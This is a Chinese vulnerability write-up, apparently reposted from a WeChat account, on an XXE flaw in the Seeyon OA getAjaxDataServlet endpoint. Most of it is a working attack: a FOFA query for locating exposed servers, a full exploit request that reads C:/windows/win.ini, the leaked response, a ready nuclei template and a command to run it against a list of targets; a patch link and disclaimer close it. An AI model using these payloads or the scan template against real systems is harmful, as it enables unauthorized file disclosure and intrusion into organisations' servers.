01漏洞名称
致远OA getAjaxDataServlet XXE漏洞
02漏洞影响
致远互联-OA
03漏洞描述
致远互联协同运营平台,打造企业数智运营中枢,助力企业实现办公业务、财务、管理与运营的一体化运作,帮助企业加强链接、用好数据做好决策,全面实现数字化。该系统getAjaxDataServlet接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器数据泄露以及被远控。
04FOFA搜索语句
app="致远互联-OA"
05漏洞复现
向靶场发送如下数据包,查看C://windows//win.ini文件内容
POST/seeyon/m-signature/RunSignature/run/getAjaxDataServletHTTP/1.1Host: 192.168.40.131:8099User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36Connection: closeContent-Length: 583Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
响应内容如下
HTTP/1.1200Connection: closeContent-Length: 1007Content-Type: text/html;charset=utf-8Date: Mon, 08 Jan 2024 04:25:57 GMTServer: SY8045Set-Cookie: JSESSIONID=0DA12779FEE71DF69052322AD81A3096; Path=/seeyon; HttpOnly<html><head><title>异常处理页面</title><linkrel="stylesheet"href="/seeyon/common/all-min.css?V=V8_0_200613_25650"><scripttype="text/javascript">if(parent && parent.errorHandle)parent.errorHandle("");</script></head><bodyclass="page_color">提示信息:<BR/>系统级错误,请检查localhost.log查看详细异常堆栈:<br/>com.kg.commons.KgException [err=[KgCommonsError]]invoke param:[KgSignatureInfo [textinfo=KgTextInfo [signText=null, fontName=宋体, fontColor=18, fontSize=12, fontStyle=0, posType=CENTER_MIDDLE, breakWord=true], waterImg=null, elemId=null, left=0, top=0], [KgProtectedData [fieldName=id, fieldDesc=caption, fieldValue=; for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1, encodeValue=OyBmb3IgMTYtYml0IGFwcCBzdXBwb3J0Cltmb250c10KW2V4dGVuc2lvbnNdClttY2kgZXh0ZW5zaW9uc10KW2ZpbGVzXQpbTWFpbF0KTUFQST0xCg==]]]</body></html>
返回信息中包含文件内容,漏洞复现成功。
06
—
nuclei poc
poc文件内容如下
id: seeyon-getAjaxDataServlet-xxeinfo:name: 致远OA getAjaxDataServlet XXE漏洞author: fgzseverity: criticaldescription: 致远互联协同运营平台,打造企业数智运营中枢,助力企业实现办公业务、财务、管理与运营的一体化运作,帮助企业加强链接、用好数据做好决策,全面实现数字化。该系统getAjaxDataServlet接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器数据泄露以及被远控。metadata:max-request:1fofa-query: app="致远互联-OA"verified: truerequests:- raw:- |+POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0(X11; OpenBSD i386) AppleWebKit/537.36(KHTML, like Gecko) Chrome/36.0.1985.125Safari/537.36Content-Type: application/x-www-form-urlencodedS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3Ematchers:- type: dsldsl:-"status_code == 200 && contains(body, 'for 16-bit app')"
运行POC
nuclei.exe -t mypoc/致远/seeyon-getAjaxDataServlet-xxe.yaml -l data/致远互联-OA.txt
07修复建议
升级到最新版本或者打上官方发布的补丁。
https://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=170原文始发于微信公众号(AI与网安):致远OA getAjaxDataServlet XXE漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论